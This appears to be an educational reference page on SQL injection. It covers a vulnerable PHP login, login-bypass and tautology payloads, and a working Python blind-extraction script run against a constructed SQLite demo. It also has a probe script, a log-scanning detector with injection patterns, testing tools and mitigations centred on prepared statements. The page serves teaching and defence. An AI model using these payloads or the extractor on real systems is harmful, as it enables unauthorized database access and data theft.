10 Jan, 2023

SQL injection

SQL injection (SQLi) is a security vulnerability in which attacker-controlled input is incorporated into a SQL statement in such a way that the database parses it as SQL rather than as data, letting the attacker read or modify the database without authorization.

Full Description: SQL injection is a web application vulnerability in which an attacker supplies input (form fields, URL parameters, cookies, headers, JSON bodies) that the application concatenates into the text of a SQL query, so that the attacker's text is executed as part of the query. This can allow the attacker to steal sensitive data, modify or delete the contents of the database, and in some configurations reach the underlying operating system. SQL injection is possible whenever an application builds a query by string concatenation instead of passing user-supplied values separately through a prepared statement with bound parameters; input validation is a useful second layer but does not by itself make the query safe.

 

Examples:

 

• An attacker may enter the following into the username field of a login form: ' OR 1=1 -- (note the trailing space after the two dashes, which MySQL requires for a comment). The WHERE clause becomes username = '' OR 1=1 followed by a comment, which is true for every row, so the query returns all users and the application typically logs the attacker in as the first user returned, often an administrator.

• Where the query's results are displayed back to the user, an attacker may use a union-based SQL injection: appending UNION SELECT ... to the original query so that rows from other tables (for example usernames and password hashes from users) are returned in the same result set and shown on the page.

 

Here is an example of PHP login code that is vulnerable to SQL injection:

 

<?php
$username = $_POST["username"];
$password = $_POST["password"];

// Vulnerable: the user-controlled values are concatenated straight into the SQL text,
// so a quote character in either field changes the structure of the query.
$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysqli_query($connection, $query);

if (mysqli_num_rows($result) > 0) {
    // login successful
} else {
    // login failed
}
?>

 

In this example, the PHP script authenticates a user by checking the submitted username and password against the records in a table called users. The problem is that it places the raw input ($username and $password) directly into the SQL string without binding it as a parameter. Because the database cannot tell where the developer's SQL ends and the user's data begins, a crafted string in either field can change the structure of the query rather than just the value being compared.

 

For example, an attacker could enter the following into the username field (with a space after the dashes): admin' --  This turns the query into:

 

SELECT * FROM users WHERE username = 'admin' -- ' AND password = 'whatever_password_entered'

 

The -- starts a SQL comment, so everything after it, including the password check, is ignored. The query now matches the admin row regardless of the password entered, the row count is greater than zero, and the login succeeds. The attacker is authenticated as admin without knowing the password.

To fix this, build the query with a prepared statement and bind the user-supplied values as parameters, so the database receives the SQL text and the data separately and never parses the data as SQL. Input validation and escaping are still worthwhile as additional layers, but they are not the fix. The parameterized version of the same check looks like this:

 

$stmt = $connection->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->bind_param("ss", $username, $password);   // "ss": both placeholders are bound as strings
$stmt->execute();
$result = $stmt->get_result();                    // then check $result->num_rows as before
// Note: comparing plaintext passwords in SQL is a separate weakness; store a hash and use password_verify().

 

This way, even if the attacker submits admin' -- or ' OR 1=1 --, the value is bound as a string literal and compared against the username column as data; it is never parsed as part of the query, so the injection has no effect.

 

SQL injection is also a route to data theft and privilege escalation even when the application never displays query results. In "blind" SQL injection the attacker injects a condition and observes only whether the page changes (boolean-based) or how long the response takes (time-based). Each request answers one true/false question, for example "is the first character of the admin password greater than 'm'?", so a value such as a password hash, credit card number or other personal data can be recovered character by character. It is slower than a union-based attack but needs nothing more than a consistent, observable difference between true and false responses.
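The following added example (not part of the original page) simulates a boolean-based blind injection end to end. A "product exists" endpoint concatenates an id into its query and reveals only whether a row matched; an attacker routine then uses that single bit per request, with a binary search over character codes, to recover the admin password from a table the endpoint was never meant to expose. The schema, the secret and the SQLite functions used (length, substr, unicode) are constructed assumptions for the demo.

```python
import sqlite3
from typing import List, Tuple


def make_target() -> sqlite3.Connection:
    """Constructed demo schema: a products table the app exposes and a users table it does not."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);"
        "INSERT INTO products VALUES (1, 'widget');"
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);"
        "INSERT INTO users VALUES (1, 'admin', 's3cret-admin');"
    )
    return conn


def product_exists(conn: sqlite3.Connection, item_id: str) -> bool:
    """Vulnerable endpoint: item_id is concatenated into the query, and the only
    observable output is whether any row came back."""
    query = f"SELECT 1 FROM products WHERE id = {item_id}"
    return conn.execute(query).fetchone() is not None


class BlindExtractor:
    """Recovers a string from the target using nothing but the boolean oracle."""

    # Subquery for the value we want; the outer query never returns it directly.
    SECRET = "(SELECT password FROM users WHERE username = 'admin')"

    def __init__(self, conn: sqlite3.Connection) -> None:
        self.conn = conn
        self.requests = 0

    def ask(self, condition: str) -> bool:
        """One request: a valid id ANDed with our condition, so the row matches only if it holds."""
        self.requests += 1
        return product_exists(self.conn, f"1 AND ({condition})")

    def search(self, expr: str, lo: int, hi: int) -> int:
        """Binary-search the integer value of a SQL expression in [lo, hi] using '>' questions."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"{expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract(self, max_len: int = 64) -> str:
        length = self.search(f"length({self.SECRET})", 0, max_len)
        chars: List[str] = []
        for pos in range(1, length + 1):
            # unicode(substr(...)) is the code point of character `pos`; printable ASCII assumed.
            code = self.search(f"unicode(substr({self.SECRET}, {pos}, 1))", 32, 126)
            chars.append(chr(code))
        return "".join(chars)


def run_demo() -> Tuple[str, int]:
    """Returns the recovered secret and how many true/false requests it cost."""
    extractor = BlindExtractor(make_target())
    secret = extractor.extract()
    return secret, extractor.requests


if __name__ == "__main__":
    secret, n = run_demo()
    print(f"recovered {secret!r} in {n} true/false requests")
```

About seven requests per character is the cost of the binary search; a tester who sees this pattern in access logs (one parameter, hundreds of near-identical requests differing in a comparison value) is looking at a blind extraction in progress.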

 

Methodology for Testing Vulnerability: Testing for SQL injection can be done manually or with automated tools; in practice the two are combined, with manual work to find candidate inputs and confirm findings and tools to cover volume. The following checklist can be followed to test for SQL injection:

• Identify every input that can reach a query: form fields, URL query strings, path segments, cookies, HTTP headers such as User-Agent and X-Forwarded-For, and JSON or XML request bodies.

• Send differential probes to each input: a single quote, two quotes, a payload with an always-true condition and one with an always-false condition (for example ' AND 1=1 -- and ' AND 1=2 -- ), and a time-delay payload for the database in use.

• Compare responses against a baseline request and look for any difference: a database error message, a changed page or result count, or a response delay matching the injected sleep.

• Use an automated scanner such as sqlmap to repeat these steps across the whole application, then confirm each reported finding manually before relying on it.
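The checklist above, as an added example that is not part of the original page, can be turned into a small probe that sends a handful of differential payloads to one parameter and classifies what it observes. The target here is a constructed stand-in for an HTTP request function: it runs a product lookup against an in-memory SQLite table and returns what a tester would see (an error page, or a result count). Against a real application you would replace the send function with one that performs the request and returns the status code plus a fingerprint of the body.

```python
import sqlite3
from typing import Callable, Dict, Tuple

# What the tester observes per request: ("error", message) or ("ok", row_count).
Response = Tuple[str, object]


def _demo_conn() -> sqlite3.Connection:
    """Constructed demo table used by both the vulnerable and the safe lookup."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);"
        "INSERT INTO products (name) VALUES ('widget'), ('gadget');"
    )
    return conn


def make_vulnerable_lookup() -> Callable[[str], Response]:
    """A lookup whose name parameter is spliced into the SQL text."""
    conn = _demo_conn()

    def lookup(name: str) -> Response:
        query = f"SELECT id FROM products WHERE name = '{name}'"
        try:
            return ("ok", len(conn.execute(query).fetchall()))
        except sqlite3.Error as exc:
            return ("error", str(exc))  # stands in for a verbose error page
    return lookup


def make_safe_lookup() -> Callable[[str], Response]:
    """The same lookup with the value bound as a parameter: the negative control."""
    conn = _demo_conn()

    def lookup(name: str) -> Response:
        rows = conn.execute("SELECT id FROM products WHERE name = ?", (name,)).fetchall()
        return ("ok", len(rows))
    return lookup


# Differential probes for one parameter; the base value is one that normally matches.
PROBES = {
    "baseline":     "gadget",
    "single_quote": "gadget'",              # breaks the SQL string if it is not escaped
    "two_quotes":   "gadget''",             # valid SQL again: an escaped quote
    "true_cond":    "gadget' AND 1=1 -- ",  # looks like baseline if injectable
    "false_cond":   "gadget' AND 1=2 -- ",  # differs from baseline if injectable
}


def probe_parameter(send: Callable[[str], Response]) -> Dict[str, object]:
    """Send every probe once and derive the two classic indicators."""
    r = {name: send(value) for name, value in PROBES.items()}
    return {
        # error on one quote but not on two: the quote reached the SQL parser
        "error_based": r["single_quote"][0] == "error" and r["two_quotes"][0] == "ok",
        # true condition == baseline and false condition != baseline: a boolean oracle
        "boolean_based": r["true_cond"] == r["baseline"] and r["false_cond"] != r["baseline"],
        "responses": r,
    }


if __name__ == "__main__":
    for label, factory in (("vulnerable", make_vulnerable_lookup), ("safe", make_safe_lookup)):
        result = probe_parameter(factory())
        print(f"{label}: error_based={result['error_based']} boolean_based={result['boolean_based']}")
```

The two-quote probe matters: an input that errors on one quote but also errors on two is usually a length or format check, not an injection, and the paired true/false conditions guard against pages that simply vary between requests.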

 

Tools:

• sqlmap: the most widely used open-source SQL injection scanner and exploitation tool; detects and exploits error-, boolean-, time- and union-based injection across most database engines

• sqlninja: exploitation tool focused on Microsoft SQL Server, including operating-system access once injection is confirmed

• Havij: Windows GUI injection tool, now dated but still encountered

• SQLiX: older scanner for locating injectable parameters

• sqliv: scanner that searches for injectable URLs across many sites

• SQLol: deliberately vulnerable application for practising injection techniques

• Burp Suite and OWASP ZAP: intercepting proxies used to find and modify every parameter, header and cookie during manual testing

 

Popular Exploits:

 

• SQL injection is most commonly used to extract sensitive information from a database, such as credit card numbers, personal information, or login credentials and password hashes.

• It can also be used to modify the contents of a database: adding, changing, or deleting records, including tampering with prices, balances or audit records.

• An attacker may use SQL injection to escalate privileges, for example by updating their own account's role to administrator, or, where the application's database account is over-privileged, by reaching the operating system through database features such as SQL Server's xp_cmdshell or MySQL's SELECT ... INTO OUTFILE.

 

Top CVEs related to this vulnerability:

None of the CVEs below is a SQL injection flaw; they are widely exploited web and server vulnerabilities of other classes:

• CVE-2019-19781: directory traversal in Citrix ADC and Gateway leading to remote code execution

• CVE-2019-16759: pre-authentication remote code execution in vBulletin

• CVE-2018-7600: remote code execution in Drupal ("Drupalgeddon 2")

• CVE-2017-9805: insecure deserialization in the Apache Struts 2 REST plugin

• CVE-2015-5352: X11 forwarding restriction bypass in OpenSSH

SQL injection is tracked under CWE-89; filtering the NVD by that CWE gives a current list of SQL injection CVEs for any product.

 

Top News related to the vulnerability:

 

• Car companies massively exposed to web vulnerabilities

• JSON syntax hack allowed SQL injection payloads to be smuggled past WAFs

• Zendesk Explore flaws opened the door to account pillage

• Sophos fixes SQL injection vulnerability in UTM appliance

 

Where to Test for this Vulnerability:

 

• During penetration tests of any web application or API that talks to a relational database

• Through an intercepting proxy (Burp Suite or OWASP ZAP), so that every parameter, header and cookie can be modified, not only the visible form fields

• On login forms, search boxes, filters and sort parameters, product or record lookups by id, and any other input whose value ends up in a query

 

Useful Courses, Practice and Videos:

 

• OWASP (Open Web Application Security Project) publishes the SQL Injection Prevention Cheat Sheet and a SQL injection section in its Web Security Testing Guide

• The SANS Institute offers a variety of courses on web application security that cover SQL injection prevention and mitigation

• The SQL Injection Wiki provides a wealth of information on different types of SQL injection attacks and how to prevent them

 

Books:

 

• "SQL Injection Attacks and Defense" by Justin Clarke

• "Hacking Exposed Web Applications" by Joel Scambray, Mike Shema, and Caleb Sima

• "The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws" by Dafydd Stuttard and Marcus Pinto

 

Payloads:

 

• ' or 1=1 -- 

• ' or 1=1#

• ' or 1=1/*

• ' or 'a'='a

• " or "a"="a

The -- form needs a space after the dashes in MySQL; # is MySQL comment syntax; the last two rely on the application's own closing quote to complete the expression. Use the quote style (single or double) that matches how the application quotes the value.

 

Sigma rules / firewall rules to block or stop vulnerability:

Network rules reduce the blast radius but do not stop SQL injection, because the attack arrives over HTTP/HTTPS through the application, which holds a legitimate connection to the database. They are still worth applying:

• block incoming traffic to port 1433 (SQL Server), 3306 (MySQL), 1521 (Oracle) and 5432 (PostgreSQL) from anything other than the application servers, so that credentials stolen through injection cannot be used for a direct connection

• alert on database-port connections from unexpected sources and on spikes in database error responses from the application tier

• for request-level detection, match URL-decoded parameters in web server or WAF logs against injection indicators: a quote followed by OR/AND, comment sequences, UNION SELECT, and SLEEP/BENCHMARK/WAITFOR
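The port rules keep the database off the network, but injection arrives over HTTP through the application, so detection has to look at request data. As an added example (not from the original page, and not a Sigma rule), here is a small scanner that URL-decodes the query strings in web access-log lines and flags the patterns the payload list on this page uses. The log lines are constructed for the demo, and the combined-log format and the indicator regexes are assumptions; pattern matching of this kind is noisy, so treat hits as triage input and keep the decoded parameter in the alert, not just a count.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Constructed sample access-log lines in combined-log style; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2023:10:01:02 +0000] "GET /search?q=widget HTTP/1.1" 200 512
10.0.0.7 - - [10/Jan/2023:10:01:09 +0000] "GET /search?q=widget%27+OR+1%3D1+-- HTTP/1.1" 200 9031
10.0.0.7 - - [10/Jan/2023:10:01:15 +0000] "GET /item?id=1+UNION+SELECT+username%2Cpassword+FROM+users HTTP/1.1" 500 211
10.0.0.9 - - [10/Jan/2023:10:02:01 +0000] "GET /item?id=42 HTTP/1.1" 200 338
10.0.0.7 - - [10/Jan/2023:10:02:30 +0000] "GET /item?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 338
10.0.0.11 - - [10/Jan/2023:10:03:00 +0000] "GET /blog/o%27neil HTTP/1.1" 200 1200
"""

# client, identd, user, [timestamp], "METHOD target PROTOCOL", status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each indicator is applied to the URL-decoded query string, case-insensitively.
SQLI_PATTERNS = {
    "tautology":  re.compile(r"'\s*or\s+[\w']+\s*=\s*[\w']+", re.I),
    "comment":    re.compile(r"(--|#|/\*)"),
    "union":      re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "time_based": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\b", re.I),
    "stacked":    re.compile(r";\s*(drop|insert|update|delete|exec)\b", re.I),
}


def decode_query(target: str) -> str:
    """Return the decoded query string of a request target ('' if it has none)."""
    if "?" not in target:
        return ""
    query = target.split("?", 1)[1]
    # Decode twice: attackers double-encode payloads to slip past filters that decode once.
    return unquote_plus(unquote_plus(query))


def scan_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one log line and return a finding if any indicator matches its query string."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = decode_query(m.group("target"))
    hits = [name for name, pattern in SQLI_PATTERNS.items() if pattern.search(query)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "status": m.group("status"), "query": query, "indicators": hits}


def scan_log(text: str) -> List[Dict[str, object]]:
    """Scan a whole log and return the findings in order."""
    return [hit for hit in (scan_line(line) for line in text.splitlines()) if hit]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

On the sample data the scanner flags three requests from the same client (a tautology with a comment, a UNION SELECT that produced a 500, and a SLEEP-based time probe) and leaves the ordinary lookups and the /blog/o%27neil path alone, since only the query string is inspected. Grouping findings by client address and counting distinct indicators per address is a reasonable next step for an alert threshold.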

 

Useful Services:

 

• A Web Application Firewall (WAF) can block known SQL injection patterns, but WAF rules are bypassable (the JSON syntax item in the news list above is one example), so a WAF is a compensating control, not a fix for the code

• Regular software patching and updates close known injection flaws in third-party components (frameworks, CMS plugins, appliances) that the application itself does not control

 

Mitigations:

 

• Use prepared statements with parameterized queries (or an ORM that does so) instead of building SQL with string concatenation; this is the primary fix.

• Validate user input against an allow-list of expected type, length and format; sanitizing is a fallback, not a substitute for parameterization.

• Run the application with a database account limited to the tables and operations it needs, with no DDL, file or operating-system functions.

• Regularly audit and monitor database and application logs for unusual activity, such as database syntax errors triggered by requests or bursts of near-identical requests to one parameter.

• Keep software and systems updated.

• Use a web application firewall to block known attack patterns as an additional layer.

• Where a value cannot be parameterized (table or column names, ORDER BY direction), map it to a fixed allow-list in code; use the driver's escaping function only as a last resort.

 

SQL injection is a serious security vulnerability that can lead to the compromise of sensitive data and even the complete takeover of a system. It is important for developers and system administrators to be aware of this threat and take steps to prevent and mitigate it. The use of prepared statements with parameterized queries, input validation and sanitization, and regular security audits can greatly reduce the risk of a successful SQL injection attack.

 
